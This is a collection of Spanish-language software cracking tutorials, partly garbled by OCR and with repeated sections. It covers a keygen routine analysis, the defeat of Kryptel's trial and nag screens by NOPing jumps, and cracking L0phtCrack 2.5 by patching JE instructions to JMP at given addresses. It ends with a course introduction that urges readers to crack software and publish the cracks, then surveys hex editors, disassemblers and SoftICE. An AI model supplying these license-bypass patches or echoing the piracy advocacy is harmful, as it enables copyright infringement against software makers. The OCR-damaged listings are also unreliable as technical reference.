014F:004091DF 83C602 | ADD ESI, 02 
014F:004091E2 668B4EFE | MOV CX, [ESI-02] 
014F:004091E6 03F9 | ADD EDI,ECX 
014F:004091E8 4A | DEC EDX 
014F:004091E9 75F2 -- JNZ 004091DD 
014F:004091EB 83F801 -- CMP EAX, 01 
014F:004091EE 720A (391 JB 004091FA 
014F:004091F0  33C9 | XOR ECX, ECX 
014F:004091F2 8A0E | MOV Ch, [ES1] 
014F:004091F4 46 | INC ESI 
014F:004091F5 03F9 | ADD EDI,ECX 
014F:004091F7 48 | DEC EAX 
014F:004091F8 75F6 -- JNZ 004091F0 
014F:004091FA 8BC7 MOV EAX, EDI 
014F:004091FC  5F POP EDI 
014F:004091FD 5E POP ESI 
014F:004091FE C3 RET 


La rutina acaba devolviendo un valor en EAX. Para sus cálculos, utiliza EDI para ir acumulando el código 
ascii de cada carácter de la clave, de la siguiente manera : 

1) Si la clave tiene 4 o más caracteres, acumula en bloques de 4 bytes en orden inverso. 

2) Si quedan 2 o más caracteres no acumulados, se suman en bloques de 2 bytes en orden inverso. 

3) Si queda algún carácter no tratado, también se suma. 


Quizás con un ejemplo se entienda mejor, así que veamos cómo actuaría la rutina con el texto "WKT- 
ECD", que en hexa es: 57 4B 54 2D 45 43 44 


1) EDI=2D544B57 ¡los 4 primeros bytes en orden inverso 
2) +00004345 ¿los 2 siguientes bytes en orden inverso 
3) +00000044 ¡el último byte 


EDI=2D548EE0 ¡valor que devuelve la rutina 


- 
Sy 


Ahora que ya hemos visto todo el proceso para calcular la clave, sólo nos queda hacer el 
Generador de Claves. 

Se puede utilizar cualquier lenguaje de programación para implementar la rutina, pero en 
este caso usaremos el JavaScript, que pese a no ser el más cómodo, nos servirá para ver los 
resultados directamente desde esta página web, sin tener que ejecutar ningún programa. 


El Generador de Claves (KeyGen) 


Empresa : 


- ( 
M vo 
cv] 


Para ver el código fuente del generador de claves, mirar la 
parte de JavaScript al principio del código fuente .htm de 
esta página. 
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INTRODUCCION 


Hola que tal, esta es la primera vez que me decido a hacer un tutorial. La verdad es que soy un 
taco de vago para escribir, pero los conocimientos hay que compartirlos sino se te pudren en la 
cabeza, como bien dijo alguien por ahí ;)) 


Bueno, este programa es un encriptador/desencriptador, yo ni siquiera se usarlo (tampoco me he 
puesto) pero es uno de otros tantos programas que 


mi colega Killman s ntretien n buscarme pa que yo lo destripe y aprenda un poquito mas ;) 
(Grasia Gitano :P) 


Se trata de una proteccion Cinderella de 30 dias, con una Nag de entrada avisandote de los dias que 
faltan para el fatidico petado de programa y una Nag despues de introducir los datos de registro, 
avisandote de que los datos introducidos se comprobaran la proxima vez que lo ejecutes y tal 


Bueno, empecemos: 


Para empezar hay que instalarlo, ejecutamos Kryptel.exe y lo instalamos obteniendo brw.exe. 


Ejecutamos bre.exe y antes de comenzar ya aparece la primera Nag avisandonosde que tenemos 30 dias 
para registrarlo. Bien, le damos a continuar y entramos en el programa. Nos vamos a la ventana de 
registro Help/Registration Code y probamos un nombre y serie aleatorio. Yo he puesto Spud y 123456. 
Pulsamos en registrar y nos da un mensage avisandonos de qu 1 numero de serie tiene un formato 
erroneo, el cual debe ser tal que asi XXXX-XXXX-XXXXXXXX. Po guay, trabajo que nos ahorra el 
programador para cuando tengamos que sacar un numero de serie valido ;) 


Ok, seguimos. Ponemos de nuevo Spud y este serial 1234-5678-12345678 y le damos a registrar, ahora 
nos aparece una ventanita dandonos las gracias por registrar el producto y bla bla bla que el 
codigo de registro que has introducido se comprobara cuando reinicies el programa y que sabras si 
es correcto o no cuando aparezca tu nombre (Spud) en la ventana de About. Vale, reiniciamos el 
programa, vamos a about y como es natural seguimos sin estar registrados. 


Muy bien, ya hemos tanteado el programa, ya sabemos que el codigo introducido o bien se guarda en 
algun lugar del ordenador o bien el codigo se procesa, se comprueba el serial y se guarda un flag 
de "Registro aceptado" en ese lugar del ordenador. En cualquiera de los dos casos ese lugar puede 
ser el registro de sistema, el propio ejecutable o algun archivo de inicializacion. Lo mas usual 
siempr s el registro de sistema asi que me voy al W32Dasm y busco en las Imported Functions 
alguna funcion referente al registro de sistema d ntre todas encuentro 


GetPrivateProfileStringA y 


SetPrivateProfileStringA 


Vale, estas funciones lo que hacen simplemente es introducir en un directorio del registro de 
sistema una Cadena de Caracteres. Una vez cerrado y abierto el programa por primera vez puedes irt 
al registro de sistema y buscar por ejemplo la cadena "Kryptel" hasta que encuentres la zona de 
nuestro programa. El buscador del registro de sistema se para un par de veces, miramos y no 
encontramos nada que nos interese, la tercera vez que se para lo hace en 

"HKEY LOCAL MACHINEASoftwarelINV softworks1Kryptel" miramos dentro y podemos ver que s ncuentran 
almacenados en forma de Cadena de texto nuestro serial y nuestro nombre. Esto quiere decir que los 
datos introducidos en la ventana de registro se almacenan en el registro de sistema y son 
recuperados luego por el programa cuando se ejecuta de nuevo, para procesarlos y decidir si el 
programa se registra o no. 


Llegado a este punto comence a poner breackpoints del tipo BPX WritePrivateProfileStringA IF 
*(*(ESP+4))= ="“RegC” y BPX GetPrivateProfileStringA IF *(* (ESP+4))= ="RegC” (la metodologia de 
estos Breackpoints la podeis comprender en el tutorial de "Crack en colores de E+P") para 
interrumpir el programa en los accesos de lectura/escritura del registro de sistema con respecto a 
nuestro serial. Podria explicaros mas a fondo en que consiste esto, pero la verdad es que llegado a 
este punto la cosa se me empezo a complicar, y decidi cambiar de estrategia. 


(Si tienes tiempo y mas experiencia que yo quizas te interese continuar ;) 


Otra estrategia 


Como lo de seguir el calculo del serial no me fue muy bien, decidi ir a por la proteccion temporal, 
asi que busque en el W32Dasm algunas funciones de acceso al reloj del sistema y me tope con las 
siguientes: 


GetSystemTimeAsFileTime, GetTickCount y GetTimeFormat 


GetTickCount cuenta los milisegunos pasados desde que se inicio Windows, GetTimeFormat formatea una 
zona de memoria para ser usada por una variable de tiempo y GetSystemTimeAsFileTime, qu s la que 
nos interesa, obtiene la fecha y hora actual en el formato de Tiempo Coordinado Universal (ke koño 
significara esto XD) la funcion se declara asi: 


VOID GetSystemTimeAsFileTime ( 


LPFILETIME lpSystemTimeAsFileTime // Puntero a una estructura de archivo de tiempo 


); 


Estructuta de archivo de tiempo: 


typedef struct  FILETIM 


A 
— 


DWORD dwLowDateTime; 


DWORD dwHighDateTime; 


paa | 


) FILETIME; 


En resumen el primer parametro que se le pasa a la funcion GetSystemTimeAsFileTim s un puntero 
hacia una estructura de 8 byes (doble DWORD) en la que se encuentra codificada la fecha y la hora 
actual. 


Asi pues entramos en accion abriendo el Softlce (CTRL+D) y poniendo un BPX GetSystemTimeAsFileTim 


Luego ejecutamos el Kryptel y caemos 


dentro de la funcion. Pulsamos F12 


pulsamos otra vez y seguimos en el KE 


RNEL asi que F5 para continuar, la 


y es que se trata de dos comprobacion 
del fichero para la ejecucion. La ter 


es iniciales de la fecha para algo 


aparecemos en el codigo del kryptel ( 


:00403A2E 68901A4100 push 00411A90 $ 


cera vez qu 1 Sice corta en esta 
BRW.EXE) Justamente aquí: 


Puntero al FILETIME 


* Reference To: KERNEL32.GetSystemTimeAsFileTime, Ord:0137h 


:00403A33 FF1510364100 Call dword ptr 


:00403A39 393508104100 cmp dword ptr 


[00413610] 


[00411C08], esi 


y entramos en el K 


ERN] 


EL, 


segunda vez ocurre lo 
relacionado con la ca 
funcion pulsamos F12 y 


echamos un vistazo a la direccion 411A90 y vemos los 8 bytes del filetim 


:d 411A90 


167:411A90 60 83 04 D9 99 20 BF 01 por supuesto en tu ordenador sera diferente. 


Bueno, ponemos un BPR 167:411A90 167: 
escribe en esa zona de la memoria. Pu 


:00403ECF FF15C8384100 Call dword ptr 


:00403ED5 A1AC124100 mov eax, dword p 


:00403EDA 3905A8124100 cmp dword ptr 


:00403EE0 7510 3ne 00403EF2 


:00403EE2 85C0 test eax, eax 


:00403EE4 750C 3ne 00403EF2 


:00403EE6 C605C423410001 mov byte ptr 


:00403EED E981000000 3jmp 00403F73 


* Referenced by a (U)nconditional or 


|:00403EE0(C), :00403EE4(C) 


411A90+7 RW para qu 1 Sice par 
lsamos F5 y se para en 403EF8: 


[004138C8] 


tr [004112AC] 


[004112?*8], eax 


[004123C4], 01 


(C)onditional Jump at Addresses: 


:00403EF2 8BODAC1A4100 mov ecx, dword ptr [00411AAC] R Fecha limite 


dE 


cada vez qu 


Ss 


mismo 


rga 


:00403EF8 8B15941A4100 mov edx, dword ptr [00411A94] B Fecha actual R AQUÍ PARA EL SICE 


:00403EFE 3BCA cmp ecx, edx [f Se comparan 


:00403F00 7F6A Jg 00403F6C Kf Salta si se supera la fecha limite 


:00403F02 A1A81A4100 mov eax, dword ptr [00411AA8] 


:00403F07 7C08 31 00403F11 f Salta si fecha actual < limite 


:00403F09 3B05901A4100 cmp eax, dword ptr [00411A90] 


:00403F0F 775B Ja 00403F6C [f Salta si se supera la hora limite 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00403F07(C) 


:00403F11 8B1D901A4100 mov ebx, dword ptr [00411A90] KR Si fecha actual < fecha limite continua el 
programa. 


Como podeis ver hemos acodizado justo en la rutina de comparacion de fechas, lo primero que hac s 
cargar en ECX los 4 segundos bytes del FILETIME que contiene la fecha limite, estos 4 ultimos bytes 
contienen el Dia/Mes/Año, y se comparan con los 4 ultimos del FILETIME de la fecha actual. Si se ha 
superado la fecha limite el programa salta a 403F6C y la verdad es que no se qu s lo que hace 
entonces, no ocurre nada! Algo habra tramado el programador porque si adelantas la fecha a 31 dias 
despues de la fecha de instalacion no ocurre nada de nada, es mas, el nag de entrada desaparece. 
Como comienzo se puede cambiar en 403F00 el JG 00403F6C por un JMP 403F6C dejara de salir el nag de 
comienzo y sea cual sea la fecha siempre evitara la nag, con esto supuestamente se consigue que el 
programa nunca Ccaduque. Sin embargo, como no me fiaba mucho de esto segui indagando un poquillo y 
retrocedi un poco hacia atrás. 


Este trozo de rutina que hemos analizado es llamado desde 403EE0 y 403EE4, veamos esto: 


:00403ECF FF15C8384100 Call dword ptr [004138C8] 


:00403ED5 A1AC124100 mov eax, dword ptr [004112AC] 


:00403EDA 3905A8124100 cmp dword ptr [004112A8], eax 


:00403EE0 7510 3ne 00403EF2 


:00403EE2 85C0 test eax, eax 


:00403EE4 750€ jne 00403EF2 


:00403EE6 C605C423410001 mov byte ptr [004123C4], 01 


:00403EED E981000000 3jmp 00403F73 


Aquí tenemos claros los dos saltos condicionales en 403EE0 y 403EE4 JNE 403EF2 que saltan hacia la 
rutina de comprobacion de la fecha, para que estos saltos no se realicen es necesatio que tanto lo 
que hay en la direccion 4112AC como lo que hay en la direccion 4112A8 sean 0. Si pones BPMD en esas 
dos direcciones y te pones a averiguar de donde salen te puedes kedar un poco pillao, asi que lo 
mejor es NOPear estos dos saltos y evitar siempre el calculo de la fecha. Dejamos correr el 
programa y vemos que el NAG no sale, la fecha no se comprueba y si nos vamos al menu de About vemos 
como el reiterado mensage de Unregistered evaluation copy es sustituido por nuestro nombre ;) 


Bueno, espero que os haya gustado mi primer tutorial, y que os haya servido de algo ;) si teneis 
alguna duda mi mail es i5780fgalileo.fie.us.es y como dice la peña esta del Wkt buscar al +ORC en 
la red. 


Karpoff Spanis 


Tutor 


Tutorial Descargado de 


Como crackear LOphtCrack 2.5 


Aca estamos de nuevo con el tutorial de cómo crackiar el mejor de los 
desencriptadores de SAM's para NT 


Bueno, como sha saben abran el programa y miren a ver que tal. 
Como vemos nos muestra esta nag: 


LOphtCrack 2.5 Trial Version XK] 


g information 
mo Ck 
for upd and latest info 


Uhmm esto me huele a Call. 
Bueno vamos a register y ponemos cualquier cosa!, nos sale con que esta mal!!!: 


LOphtCrack 2.5 


IN You have entered an invalid code. Please try again. 


Apuntamos a esa frase: You have entered a invalid code. 
Y la buscamos en el W32Dasm en las string references (fijense que esta abajo del todo 
para que no pierdan tiempo buscándola): 


“You have entered an invalid code. " genial!!! 
"You have successfully registered " mal!!! 
"You must choose a password file! " 

"You must choose a wordlist file! " 

"You need to select a worafile!" 

"Your trial version of LOphtCrack " mal!!! 


Ahora hacemos 2 click en la referencia a You have entered an invalid code 


* Possible StringData Ref from Data Obj ->"You have entered an invalid code. " 
->"Please try again." 


| 
:00406371 6830354800 push 00483530 


:00406376 E8F0020500 call 0045666B 

:0040637B 56 push esi 

:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0] 
:00406383 E812EE0300 call 0044519A 

:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080] 
:0040638F E88ED50300 call 00443922 

:00406394 83F801 cmp eax, 00000001 

:00406397 0F846EFFFFFF je 0040630B 

:0040639D E9A9000000 jmp 0040644B 


Por aquí no hay nada interesante, vamos a fijarnos mas arriba a ver que hay. 


:00406355 85C0 test eax, eax 

:00406357 7449 je 004063A2 Interesante 
:00406359 8B03 mov eax, dword ptr [ebx] 
:0040635B 8D54242C lea edx, dword ptr [esp+2C] 
:0040635F 52 push edx 

:00406360 50 push eax 

:00406361 ESFAFEO100 call 00426260 

:00406366 83C408 add esp, 00000008 
:00406369 85C0 test eax, eax 

:0040636B 7435 je 004063A2 Interesante 


Uhmmm que sera esto? Vamos a ejecutar alguno de los dos por que como sha saben 
van a la misma dirección =) 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00406357(C), :0040636B(C) 


:004063A2 83C9FF or ecx, FFFFFFFF 


:004063A5 C785C000000000000000 mov dword ptr [ebp+000000C0], 00000000 
:004063AF 33C0 xor eax, eax 


Caemos aqui y como predan ver nos saltamos la nag que dice You have entered a 
invalid.... Bueno entonces que hacemos???? Nos fijamos el offset de los 2 saltos 


00406357 7449 je 004063A2 CAMBIAR A JMP (EB en hexadecimal) 
:0040636B 7435 je 004063A2 CAMBIAR A JMP (EB en hexadecimal) 
LOphtCrack 2.5 


IN You have successfully registered LOphtCrack 2.5. 


Bueno sha no nos muestra la nag del serial malo, pero todavía no esta registrado 
completamente. Ahora lo que tenemos que hacer es que cuando el tiempo se termine 
no nos mueste el mensaje de Your trial versión has..... tonces buscamos esa string y 
vemos: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004062CD(C) 
| 


:00406487 8B85C0000000 mov eax, dword ptr [ebp+000000C0] 
:0040648D 85C0 test eax, eax 

:0040648F 741F je 004064B0 

:00406491 8B85C4000000 mov eax, dword ptr [ebp+000000C4] 
:00406497 85C0 test eax, eax 

:00406499 7F15 jg 004064B0 

:0040649B 6A00 push 00000000 

:0040649D 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Your trial version of LOphtCrack " 
->"2.5 has expired. You must register" 


Uhm no se porque quise ir a: 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004062CD(C) 


Pues fui y vi... 

:004062CA 83F801 cmp eax, 00000001 
:004062CD 0F85B4010000 jne 00406487 
:004062D3 6A00 push 00000000 


Si se ejecuta el jne nos va al mensaje de expiracion! Tonces lo que tenemos que hacer 
es noopear los 6 bytes y listo! OK todo bien no nos sale el mensaje, todavía no esta 
registrado!!! 


Por una de esas cosas de la vida se me abrio el cerebro ZenCracker y veo esto 

* Possible StringData Ref from Data Obj ->"%d" 

y pienso %d parese ser una variable de dias por que d es la primer letra de dia digo 
no? Y si vemos que hay mas arriba? Ok ahí vamos! 

Vemos esto que es lo mas sospechoso que hay, que si se ejecuta se va lejos de todos 
los demas saltos y otras yerbas!! 

Asi que lo cambiamos a JMP o en su defecto a JNE y listo ya no aparece la nag del 
ortooo 

:00406265 0F8485020000 je 004064FO 


La verdad que esto ultimo lo encontre de puro Zen Cracking (ojete) =) 


Nahhh bueno un saludo para todos los seguidores de Zen Crackers Team! [zCt] y 
saludo para todo limados, marduk, etc! 


Como crackear LOphtCrack 2.5 


Aca estamos de nuevo con el tutorial de cómo crackiar el mejor de los 
desencriptadores de SAM's para NT 


Bueno, como sha saben abran el programa y miren a ver que tal. 
Como vemos nos muestra esta nag: 


LOphtCrack 2.5 Trial Version XK] 


g information 
mo Ck 
for upd and latest info 


Uhmm esto me huele a Call. 
Bueno vamos a register y ponemos cualquier cosa!, nos sale con que esta mal!!!: 


LOphtCrack 2.5 


IN You have entered an invalid code. Please try again. 


Apuntamos a esa frase: You have entered a invalid code. 
Y la buscamos en el W32Dasm en las string references (fijense que esta abajo del todo 
para que no pierdan tiempo buscándola): 


“You have entered an invalid code. " genial!!! 
"You have successfully registered " mal!!! 
"You must choose a password file! " 

"You must choose a wordlist file! " 

"You need to select a worafile!" 

"Your trial version of LOphtCrack " mal!!! 


Ahora hacemos 2 click en la referencia a You have entered an invalid code 


* Possible StringData Ref from Data Obj ->"You have entered an invalid code. " 
->"Please try again." 


| 
:00406371 6830354800 push 00483530 


:00406376 E8F0020500 call 0045666B 

:0040637B 56 push esi 

:0040637C 8D8C24E0000000 lea ecx, dword ptr [esp+000000E0] 
:00406383 E812EE0300 call 0044519A 

:00406388 8D8C2480000000 lea ecx, dword ptr [esp+00000080] 
:0040638F E88ED50300 call 00443922 

:00406394 83F801 cmp eax, 00000001 

:00406397 0F846EFFFFFF je 0040630B 

:0040639D E9A9000000 jmp 0040644B 


Por aquí no hay nada interesante, vamos a fijarnos mas arriba a ver que hay. 
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invalid.... Bueno entonces que hacemos???? Nos fijamos el offset de los 2 saltos 


00406357 7449 je 004063A2 CAMBIAR A JMP (EB en hexadecimal) 
:0040636B 7435 je 004063A2 CAMBIAR A JMP (EB en hexadecimal) 
LOphtCrack 2.5 


IN You have successfully registered LOphtCrack 2.5. 


Bueno sha no nos muestra la nag del serial malo, pero todavía no esta registrado 
completamente. Ahora lo que tenemos que hacer es que cuando el tiempo se termine 
no nos mueste el mensaje de Your trial versión has..... tonces buscamos esa string y 
vemos: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004062CD(C) 
| 


:00406487 8B85C0000000 mov eax, dword ptr [ebp+000000C0] 
:0040648D 85C0 test eax, eax 

:0040648F 741F je 004064B0 

:00406491 8B85C4000000 mov eax, dword ptr [ebp+000000C4] 
:00406497 85C0 test eax, eax 

:00406499 7F15 jg 004064B0 

:0040649B 6A00 push 00000000 

:0040649D 6A00 push 00000000 


* Possible StringData Ref from Data Obj ->"Your trial version of LOphtCrack " 
->"2.5 has expired. You must register" 


Uhm no se porque quise ir a: 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:004062CD(C) 


Pues fui y vi... 

:004062CA 83F801 cmp eax, 00000001 
:004062CD 0F85B4010000 jne 00406487 
:004062D3 6A00 push 00000000 
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es noopear los 6 bytes y listo! OK todo bien no nos sale el mensaje, todavía no esta 
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no? Y si vemos que hay mas arriba? Ok ahí vamos! 

Vemos esto que es lo mas sospechoso que hay, que si se ejecuta se va lejos de todos 
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UN POCO DE TODO: 


¡Saludos Familia ! 


¡He decidido crear esta serie de capítulos con un objetivo puramente educativo (sin ningún tipo de obscuro interés 
¡comercial). Mi objetivo es ayudar a los nuevos crackers en sus primeros pasos. 


¡Agradecimientos 


¡Al TodoPoderoso +0RC, a su acólito +FRAVIA y a los miembros de WKT por su apoyo. 


¡¿Qué es eso de crackear? 


¡Crackear es el arte de reventar protecciones software/hardware con fines intelectuales, personales pero no 
lucrativos. Crackear también se llama ingeniería inversa (Reverse Engineering), ya que sin el programa fuente se 
'es capaz de analizar el comportamiento del programa y modificarlo para tus intereses. 


¿Por qué crackear? 


'Vivimos en un una sociedad que da asco. Es inconcebible que se destruyan o penalicen la producción de productos 
¡básicos (cereales,lácteos...) en aras de una estabilidad de precios. Vivimos en una sociedad donde el 95% de la gente 
¡se ve sometida al control de un 5 %. Toda persona debería tener un mínimo de recursos para ser feliz,pero esto no 
les así. 


El noble arte del crakeo es una herramienta para distribuir la riqueza entre la sociedad. Si necesitas un programa 
¡(que tienes en un CD-ROM) y no tienes una cuenta en un banco USA, ni 30 dólares, ¿por qué narices tienes que 
esperar y pagar si lo necesitas?, crackealo y publica el crack en Internet. Así ayudarás a la gente menos 


¡afortunada que está axifiada por esta sociedad desigualitaria. 


¿A quién va dirigido este curso? 


Este curso va dirigido a toda persona con interés en el crack y/o con la filosofía crack. Sin olvidar a los 
programadores. 


¡¿Qué es lo que vamos a aprender? 
¡Dejaremos de un lado el añorado DOS, para centrarnos en cracks para programas en W95. 
¡¿No estaremos quitando el pan a los programadores de aplicaciones? 


Los programadores viven muy bien a costa de los royaltis que pagan las grandes empresas y esos repugnantes 
yupis encorbatados con escased de neuronas. Además, un programa crakeado es más conocido y utilizado que uno 
que no lo esté. Digamos que el crack es una forma de publicidad. Baste recordar el compilador de Pascal de la casa 
Borland. Originalmente fue copieteado y distribuido casi libremente hasta la saciedad. Borland conocía este hecho 
¡y por eso no introdujo ningún tipo de protección. Al cabo de poco tiempo, esos estudiantes se convirtieron en 
¡programadores que reclamaban a sus empresas la compra del compilador que sabían utilizar, el Pascal de 
Borland. Si las casas de soft ya son ricas sin nuestro dinero, ¿a que estado de corrupción se llegaría si lo tuvieran?. 


¡Aunque parezca extraño este ensayo está dedicado a formar a los programadores , mostrándoles sus defectos y el 
¡camino para producir software de calidad. 


¡En último caso depende de la conciencia de cada uno, si crees que un programador ha realizado una buena 
¡aplicación, que te es útil y que además está bien programada, entonces obra adecuadamente y recompénsalo 
registrándote. A decir verdad sólo he encontrado un programa de este estilo 


¡¿Qué necesito pa esto de crakear? 
- Interés y PazY Ciencia. 


¡- Algún conocimiento de ensamblador. Cuanto más conozcas mejor crackearás, pero para este curso mas bien 
¡poco, intentaré hacer las cosas fáciles. 


|- Ayuda de otro cracker más experto (por ejemplo Estado+Porcino) 


IDEAS BÁSICAS SOBRE CRACKING 


Un programa no es más que un montón de instrucciones (haz, esto, haz lo otro), una tras otra. Estas instrucciones, 
(en general) están en memoria, parte de ellas se encargan de impedir la ejecución del resto (el verdadero 
¡programa). Resumiendo, tienes un bonito programa tras una puerta (esquema de protección), nuestro objetivo es 
reventar la puerta, buscar la llave,pasar por las rendijas,quemarla..., como puedes ver una cantidad inagotable de 
¡ataques. 


Un pequeño inciso, sólo puedes reactivar instrucciones que se encuentren en el programa. Por ejemplo, si se ha 
desactivado la opción de salvar, puede ser que el conjunto de sentencias para salvar el programa esté presente 
¡pero desactivado, o bien que simplemente no esté. Si están las sentencias, se pueden reanimar, sino están entramos 
en un mundo diferente, una evolución del cracking, la apasionante Reconstrucción Software, pero eso será tema 
¡de otro capítulo. 


HERRAMIENTAS CRACK 


¡Demos un breve repaso a las principales herramientas que utilizaremos a lo largo del curso. Existen otras muchas 
¡herramientas que las comentaré cuando nos sean necesarias. 


¡Editor hexadecimal 


Los programas no son más que un conjunto de instrucciones y cada instrucción no es más que un conjunto de bits, 
pero donde demonios se guardan esos bits?. 
| 


¡Los bits del programa se localizan en los ficheros, p.e. las instrucciones del programa de compresión arj se 
¡guardan en el fichero arj.exe. Hay algunos programas que no guardan todas sus instrucciones en único fichero, si 
¡no en varios, un ejemplo de esto son los programas que utilizan librerías dinámicas (o dll) 


'Un editor hexa, no es más que un programa, que permite "editar'' los ficheros de instrucciones de otros 
programas, osea, que permite ver,modificar,copiar,pegar... los bits de los programas. Para simplificar la cosa no se 
muestran los bits a pelo, sino que se muestran en hexadecimal, de ahí su nombre. Nosotros lo utilizaremos para 
alterar el comportamiento de los programas. Supongamos que conocemos la instrucción sentencia de la rutina de 
¡protección que debemos modificar, sea jz 23 y queremos modificarla por jnz 23, bien como toda instrucción no es 
¡más que un conjunto de bits, sea 0110 para jz 23 y 1001 para jnz 23, sólo nos queda buscar estos bits dentro del 


fichero ejecutable del programa (que es, en general, el contiene las sentencias del programa). Como usamos un 
editor hexa, debemos buscar la secuencia de un unos y ceros en hexa en el fichero del programa que queremos 
modificar. Si la secuencia que buscamos es muy común deberemos utilizar las instrucciones que se encuentran 
entorno a la instrucción a modificar. 


Esto es muy importante, sólo debe existir una localización del patrón de búsqueda en el fichero, si existe más de 
una, debemos añadir a la búsqueda las sentencias de alrededor, sino se corre el riego de modificar la sentencia 
equivocada, lo que provoca casi siempre un "cuelgue". 


Un no es más que una modificación de las instrucciones de un fichero, así pues para hacer un crack debemos saber 
que instrucciones modificar y en qué fichero. Una vez crackeado el fichero, el programa se comportará siguiendo 
la nueva sentencia que le hemos modificado. 


Hay un montón de editores hexa, yo os recomiendo UltraEdit-32 Professional, os lo podéis bajar de 
http://ftpsearch.ntnu.no/ 


(excelente herramienta de búsqueda en la Web, utilízala cuando no encuentres algún fichero) busca w32dasm. Yo 
utilizo la versión 4.31a. Cada cracker tiene su editor favorito, !lencuentra el tuyo!. Este programa es shareware, así 
que tendrás que crackearlo, recuerda : lo primero que tienes que crakear son tus propias herramientas. Si no 
puedes crackearlo, busca otro editor hexa, los hay a montones. 


Desensamblador 


Un desensamblador toma un fichero de instrucciones en hexa y lo convierte a lenguaje ensamblador. El lenguaje 
ensamblador, es el conjunto de sentencias que entiende el microprocesador (tu Pentium o mi 486). El procesador 
es el corazón del ordenador, todas las sentencias son ejecutadas por él y sólo por él. Por ejemplo un 43 en hexa se 
transforma en inc eax. Se necesitan algunos conocimientos de ensamblador pa esto de crackear. 


Nosotros usaremos el desensamblador para crakear con la técnica de la lista muerta que veremos más adelante. 


Puedes pillar un magnífico desensamblador para W95 en http://www/expage.com/page/w32dasm , es shareware, 


así que deberás crackearlo. Próximamente le dedicaremos un capítulo al w32dasm y aprenderemos a crackearlo. 
Yo utilizo la versión 8.9, aunque una posterior es también útil. 


Debugger 


Un debugger permite ejecutar instrucción a instrucción (instrucciones en ensamblador, se entiende) un programa, 
por tanto también ejecutará instrucción a instrucción la rutina de protección, ya que es parte del programa. Esto 
nos permitirá analizar su comportamiento. 


El mejor debugger para W95 es sin duda el Softice quo te lo puedes bajar de http://www.numega.com , es sin duda 
uno de los mejores programas que he visto en mi vida. Te recomiendo que te bajes también los manuales. El 
Softice es una de las mejores herramientas cuanto más domines al Softice, mejor crakearás, y te aseguro que se 
pueden realizar verdaderas maravillas con él. Para trazar (esto es, pasar el debug) a programas MS-DOS, puedes 
utilizar versiones anteriores del Softice o utilizar algunos de los excelentes debugger que hay para Dos como el 
SymbDebug. 


Os indicaré un par de consejos y trucos para el Softice. 
--> Instalación 


Haz la prueba de pantalla, si te la saltas, lo más seguro es que cuando actives el Softice se te quede la pantalla a 
rayas. Busca el driver de la tarjeta de vídeo que tengas instalada en W95 dentro de la lista que se ofrece. Aunque 
la encuentres, haz la prueba de pantalla, es posible que no funcione correctamente. Si no encuentras tu tarjeta de 
vídeo o tienes problemas de pantalla, corta la instalación y selecciona ''Adaptador de Vídeo Standard VGA", 
reinstala el Softice y utiliza ese mismo driver para la prueba de pantalla. Si sigues teniendo problemas te remito a 
la Doc del Softice (que deberías haberte bajado). Particularmente, con el adaptador Standard VGA no he tenido 
nunca problemas. Hay por ahí sueltos una ampliación de drivers de tarjetas para Softice, búscalos si no quieres 


¡pasa a la VGA Standard. 


Activa la opción de ratón, te evitará escribir bastantes secuencias hexa de instrucciones, te permitirá moverte 
libremente por las ventanas, seleccionar, copiar y pegar texto así como redimensionar las ventanas. 


--->Configuración 


El Loader es una pequeña utilidad que permite especificar el programa que queremos depurar y además nos 
permite configurar el Softice, En Edit/SoftlIce Initialization Settings/Initialization string pon X;wl;wr;wd7; code 
on; y en Histoy Buffer Size pon 512 

Abre el fichero winice.dat (dentro del directorio de instalación del Softice) , toda línea del tipo 
EXP=cWwindowsisystemisystem.drv , quítale el punto y como inicial. 


--->Ejecución 


El Softice debe cargarse siempre antes que W95. Si estas en W95, reinicializa en modo MS-DOS y ejecuta 
WINICE.EXE, este cargará el Softice y W95. Te recomiendo que utilices un fichero bat. 


Las ventanas que aparecen son 


Ventana de registros de la CPU (wr). A los típicos se ha añadido una E así se diferencia los registros normales que 
admiten 16 bits, de los registros que soportan 32 bits. Por ejemplo, ax se llama ahora eax. Siempre podremos 
referencias a ax, sabiendo que nos quedaremos con 16 bits últimos de eax. 


Ventana de datos de la CPU (wd). Muestra la memoria en formato hexa, ahí se pueden apreciar los datos que 
maneja el programa, entre otras cosas. 


Ventana de código (wc). Muestra, la dirección de memoria en la que se encuentra la instrucción, la codificación 
hexa de la instrucción y la instrucción en ensamblador. 


Ventana de control, el la que aparece arriba el nombre del programa que estamos trazando. Aquí es donde 
introduciremos los comandos del SoftIce. 


He aquí algunos comandos fundamentales para el Softice: 
CTRL+D 


Conmuta de W9S5 al Softice y viceversa. No te asustes por el pantallazo ni por el aspecto cutre inicial, llegarás a 
quererlo, créeme. Si salen rayas, vuelve a leer el apartado -->Instalación 


F4 
Estando en Softice, te permite echar un ojo al estado actual en W95 sin necesidad de conmutar. 
F8 


Ejecuta una instrucción, las modificaciones en los registros del sistema aparecen de diferente color. Si la 
instrucción es una llamada a una rutina, se ejecutarán una a una todas las instrucciones de la rutina llamada. 


FI0 


Ejecuta una instrucción, las modificaciones en los registros del sistema aparecen de diferente color. Si la 
instrucción es una llamada a una rutina, se ejecutan de golpe todas las sentencias de la rutina llamada. 


FIL 


Ejecuta de golpe todas las instrucciones de la rutina actual y se para el la instrucción siguiente de la rutina padre 
que llamó a esta rutina. Esto nos permite trazar al padre, estando en una rutina hija. En cuanto la uses menudo 
verás que no es tan complicado como parece. 


FI2 
Ejecuta todas las sentencias hasta el primer ret (incluido) 
bpx nombreRutina 


Salta al Softice cuando se ejecuta la rutina cuyo nombre es nombreRutina. Ejemplo bpx messageboxa saltará al 
Softice cuando el programa muestre una ventana de mensaje del tipo mensaggebox. 


bpx dirInstrucción 
Salta al Softice cuando se ejecuta la instrucción que está es la dirección de memoria dirInstrucción. 
bpr dirlni dirFin rw 


Salta al Softice cuando hay un acceso de lectura o escritura en las direcciones dirIni,dirFin ambas incluidas. 
Ejemplo bpr 100 109 rw que puesto de otra forma más fácil de expresar, nos queda algo como bpr 100 100+9 rw 


